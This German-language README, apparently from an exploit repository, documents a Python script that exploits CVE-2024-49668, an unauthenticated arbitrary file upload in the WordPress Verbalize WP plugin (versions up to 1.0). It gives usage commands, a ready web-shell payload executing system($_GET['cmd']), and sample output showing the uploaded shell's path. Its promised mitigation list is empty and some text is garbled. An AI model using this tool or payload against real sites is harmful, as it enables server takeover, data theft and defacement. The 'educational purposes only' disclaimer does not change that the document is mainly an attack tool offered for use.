
WordPress Verbalize WP Plugin <= 1.0 - Sicherheitslücke für beliebigen Datei-Upload
CVE-2024-49668 ist eine kritische Sicherheitslücke im WordPress Verbalize WP Plugin, Version 1.0 und darunter. Diese Sicherheitslücke ermöglicht es nicht authentifizierten Angreifern, beliebige Dateien, einschließlich Web-Shells, auf den Webserver hochzuladen. Das Problem entsteht durch unzureichende Eingabevalidierung und fehlende Dateitypbeschränkungen beim Datei-Upload.
Dieses Python-Skript nutzt die Schwachstelle CVE-2024-49668 aus, um eine Shell-Datei mithilfe des Verbalize WP Plugins auf die Ziel-Website hochzuladen.
readme.txt prüft.requests BibliothekInstallieren Sie die erforderliche Bibliothek mit pip:
pip install requests
usage:
CVE-2024-49668.py [-h] -u URL [-s SHELL]
Execute a POST request to a WordPress site.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-s, --shell SHELL Shell code to upload
Standardmäßig lädt das Skript eine PHP-Shell hoch, die phpinfo() ausführt.
python CVE-2024-49668.py -u http://target.com
Sie können auch einen benutzerdefinierten PHP-Shell-Code zum Hochladen angeben:
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi
Die Schwachstelle CVE-2024-49668 ermöglicht es Angreifern, durch das Hochladen schädlicher Dateien die vollständige Kontrolle über den Zielserver zu erlangen. Die Ausnutzung dieser Schwachstelle kann schwerwiegende Folgen haben, darunter Datenlecks, unbefugter Zugriff und mögliche Verunstaltung der Website.
Um Ihre WordPress-Seite vor dieser Schwachstelle zu schützen, wird Folgendes empfohlen:
Dieses Tool dient ausschließlich zu Bildungszwecken. Die unbefugte Verwendung dieses Tools gegen Websites ohne ausdrückliche Genehmigung des Eigentümers ist illegal. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Created on 2025-03-22 by Nxploited , Khaled alenazi